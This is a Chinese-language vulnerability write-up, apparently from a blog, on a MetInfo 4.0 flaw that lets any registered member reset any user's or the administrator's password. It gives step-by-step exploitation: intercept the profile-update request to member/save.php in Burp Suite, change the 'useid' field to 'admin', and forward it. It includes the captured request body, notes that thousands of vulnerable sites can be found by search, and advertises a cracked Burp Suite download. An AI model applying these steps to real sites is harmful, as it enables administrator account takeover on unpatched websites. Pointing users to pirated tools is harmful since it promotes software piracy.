簡要描述:
MetInfo4.0註冊會員後,可以修改任意用戶和管理員密碼,影響巨大
百度或者谷歌裏可以找到上千用MetInfo4.0的企業站,危害特別嚴重!
詳細說明:
百度搜索隨便就一大堆,此前沒有看到過這個版本的漏洞導致很多人還在繼續用4.0版本
漏洞頁面:member/save.php 註冊頁面:/member/ 默認後臺:/admin
先註冊一個用戶然後登錄後點擊修改基本資料
填寫好修改的密碼後打開抓包工具進行抓包這裏我使用Burp Suite
如果沒有的朋友可以去博客前面的文章下載《***測試神器Burp Suite v1.6.17破解版下載》
先用火狐設置下http代理 IP爲本地:127.0.0.1 端口要和Burp Suite的端口一樣 都是8080
默認的Burp Suite監聽端口都是8080的
設置好後點擊添加信息即可看到如下內容
Cookie: PHPSESSID=004c459b13c11bcf58a388a87942abfbContent-Type: application/x-www-form-urlencodedContent-Length: 296useid=caonima&lang=cn&pass1=123456.&pass2=123456.&realname=&sex=1&tel=&mobile=&email=123456%40qq.com&qq=&msn=&taobao=&admin_introduction=&companyname=%E8%8D%89%E6%B3%A5%E9%A9%AC%E5%85%AC%E5%8F%B8&companyfax=&companycode=&companyaddress=&companywebsite=&Submit=%E6%8F%90%E4%BA%A4%E4%BF%A1%E6%81%AF
現在要做的就是修改包的內容 將
useid=caonima //修改成管理員的用戶名admin 然後把包放出去即可修改成功。!
點擊intercept is on 即可!發送出去 ,如果在網頁中提示如下即修改密碼成功
修改就可以使用剛纔修改的密碼登錄admin管理員帳號了